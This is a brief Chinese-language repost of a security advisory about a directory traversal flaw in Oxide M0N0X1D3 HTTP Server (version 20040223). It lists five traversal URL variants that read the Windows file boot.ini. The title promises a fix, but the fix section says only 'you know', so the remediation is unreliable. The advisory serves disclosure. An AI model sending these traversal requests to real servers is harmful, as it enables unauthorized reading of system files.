Oxide M0N0X1D3 HTTP Server目录遍历缺陷及修复 - 网站安

 

标题: Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability

程序: Oxide M0N0X1D3 HTTP Server

影响版本: 20040223

开发者: http://sourceforge.net/projects/oxide-ws/

程序: Medium

问题描述:

Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser.

 

示例:

****************************************************************

http://www.2cto.com /..\..\..\boot.ini

http://www.2cto.com /..\\..\\..\\boot.ini

http://www.2cto.com /..\/..\/..\/boot.ini

http://www.2cto.com //..\/..\/..\boot.ini

http://www.2cto.com /.\..\.\..\.\..\boot.ini

..

 

www.2cto.com 修复方案：

 

你懂得

查看更多关于Oxide M0N0X1D3 HTTP Server目录遍历缺陷及修复 - 网站安的详细内容...